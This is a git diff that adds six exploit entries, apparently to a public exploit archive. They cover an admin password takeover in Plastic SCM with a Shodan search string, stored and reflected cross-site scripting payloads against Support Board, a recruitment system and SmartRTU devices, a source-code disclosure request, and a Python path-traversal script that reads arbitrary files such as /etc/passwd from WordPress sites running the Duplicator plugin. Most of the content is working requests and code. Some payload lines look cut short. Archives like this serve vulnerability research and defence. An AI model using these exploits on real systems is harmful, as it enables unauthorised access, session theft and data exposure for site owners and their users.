diff --git a/exploits/multiple/webapps/50426.txt b/exploits/multiple/webapps/50426.txt new file mode 100644 index 000000000..29bc38695 --- /dev/null +++ b/exploits/multiple/webapps/50426.txt @@ -0,0 +1,21 @@ +# Exploit Title: Plastic SCM 10.0.16.5622 - WebAdmin Server Access +# Shodan Dork: title:"Plastic SCM" +# Date: 18.10.2021 +# Exploit Author: Basavaraj Banakar +# Vendor Homepage: https://www.plasticscm.com/ +# Software Link: https://www.plasticscm.com/download/releasenotes/10.0.16.5622 +# Version: Plastic SCM < 10.0.16.5622 +# Tested on: Chrome,Firefox,Edge +# CVE : CVE-2021-41382 + +# Reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468 + +# Exploit: + +1. Navigate to target.com/account [This holds administrator login console] + +2. Change URL to target.com/account/register [Here able to set new password for the adminstrator user] + +3. Now after changing password of administrator and login to console and Navigate to target.com/configuration/authentication and set an new password for any of the users + +4. Now navigate to target.com/webui/repos and login with the recently changed password for user i.e is in step 3 \ No newline at end of file diff --git a/exploits/php/webapps/50419.txt b/exploits/php/webapps/50419.txt new file mode 100644 index 000000000..aa738f827 --- /dev/null +++ b/exploits/php/webapps/50419.txt @@ -0,0 +1,19 @@ +# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS) +# Date: 16/10/2021 +# Exploit Author: John Jefferson Li +# Vendor Homepage: https://board.support/ +# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 +# Version: 3.3.4 +# Tested on: Ubuntu 20.04.2 LTS, Windows 10 + +POST /supportboard/include/ajax.php HTTP/1.1 +Cookie: [Agent+] +Accept: */* +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Content-Length: 808 +X-Requested-With: XMLHttpRequest +Connection: close + +function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=&language=false \ No newline at end of file diff --git a/exploits/php/webapps/50420.py b/exploits/php/webapps/50420.py new file mode 100755 index 000000000..63edc44da --- /dev/null +++ b/exploits/php/webapps/50420.py @@ -0,0 +1,24 @@ +# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read +# Date: October 16, 2021 +# Exploit Author: nam3lum +# Vendor Homepage: https://wordpress.org/plugins/duplicator/ +# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip] +# Version: 1.3.26 +# Tested on: Ubuntu 16.04 +# CVE : CVE-2020-11738 + +import requests as re +import sys + +if len(sys.argv) != 3: + print("Exploit made by nam3lum.") + print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd") + exit() + +arg = sys.argv[1] +file = sys.argv[2] + +URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file + +output = re.get(url = URL) +print(output.text) \ No newline at end of file diff --git a/exploits/php/webapps/50421.txt b/exploits/php/webapps/50421.txt new file mode 100644 index 000000000..a65b79859 --- /dev/null +++ b/exploits/php/webapps/50421.txt @@ -0,0 +1,72 @@ +# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS) +# Date: 17-10-2021 +# Exploit Author: Aniket Deshmane +# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip +# Version: 1 +# Tested on: Windows 10,XAMPP + +Steps to Reproduce: +1)Navigate to http://127.0.0.1/employment_application & Login with staff account . +2) Navigate to vacancies tab +3) Click on Add new . +4)Add Payload +"> + +in Vacancy Title field. + +5)Click on Save and you are done. It's gonna be triggered when anyone +visits the application. + +Request:- + +POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; +boundary=---------------------------15502044322641666722659366422 +Content-Length: 931 +Origin: http://127.0.0.1 +DNT: 1 +Connection: close +Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Cache-Control: no-transform + +-----------------------------15502044322641666722659366422 +Content-Disposition: form-data; name="id" + + +-----------------------------15502044322641666722659366422 +Content-Disposition: form-data; name="title" + +"> +-----------------------------15502044322641666722659366422 +Content-Disposition: form-data; name="designation_id" + +1 +-----------------------------15502044322641666722659366422 +Content-Disposition: form-data; name="slots" + +1 +-----------------------------15502044322641666722659366422 +Content-Disposition: form-data; name="status" + +1 +-----------------------------15502044322641666722659366422 +Content-Disposition: form-data; name="description" + + +-----------------------------15502044322641666722659366422 +Content-Disposition: form-data; name="files"; filename="" +Content-Type: application/octet-stream + + +-----------------------------15502044322641666722659366422-- \ No newline at end of file diff --git a/exploits/php/webapps/50422.txt b/exploits/php/webapps/50422.txt new file mode 100644 index 000000000..6e38ab7b4 --- /dev/null +++ b/exploits/php/webapps/50422.txt @@ -0,0 +1,41 @@ +# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure +# Date: 2021-17-10 +# Exploit Author: Hamit CİBO +# Vendor Homepage: https://www.inea.si +# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/ +# Version: ME RTU +# Tested on: Windows +# CVE : CVE-2018-16060 + + +# PoC +# Request + +GET /web HTTP/1.1 +Host: **.**.**.*** +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; +x64; Trident/5.0) +Connection: close + +# Response + +HTTP/1.1 200 OK +Date: Wed, 08 Aug 2018 08:09:53 GMT +Server: Apache/2.4.7 (Ubuntu) +Content-Location: web.tar +Vary: negotiate +TCN: choice +Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT +ETag: "93800-5083300f58d00;51179459a2c00" +Accept-Ranges: bytes +Content-Length: 604160 +Connection: close +Content-Type: application/x-tar + + +Reference : + +https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH \ No newline at end of file diff --git a/exploits/php/webapps/50423.txt b/exploits/php/webapps/50423.txt new file mode 100644 index 000000000..78e96f4d2 --- /dev/null +++ b/exploits/php/webapps/50423.txt @@ -0,0 +1,57 @@ +# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) +# Date: 2021-17-10 +# Exploit Author: Hamit CİBO +# Vendor Homepage: https://www.inea.si +# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/ +# Version: ME RTU +# Tested on: Windows +# CVE : CVE-2018-16061 + + +# PoC +# Request + +POST +/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25% +3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1 +Host: **.**.**.*** +Content-Length: 132 +Cache-Control: max-age=0 +Origin: http://**.**.**.*** +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/68.0.3440.84 +Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://**.**.**.***sss/login.php +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7 +Connection: close + +submitted=1&username=-- +%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw +ord=&Submit=Login + +# Response + +HTTP/1.1 200 OK +Date: Wed, 08 Aug 2018 08:14:25 GMT +Server: Apache/2.4.7 (Ubuntu) +X-Powered-By: PHP/5.5.9-1ubuntu4 +Vary: Accept-Encoding +Content-Length: 3573 +Connection: close +Content-Type: text/html + +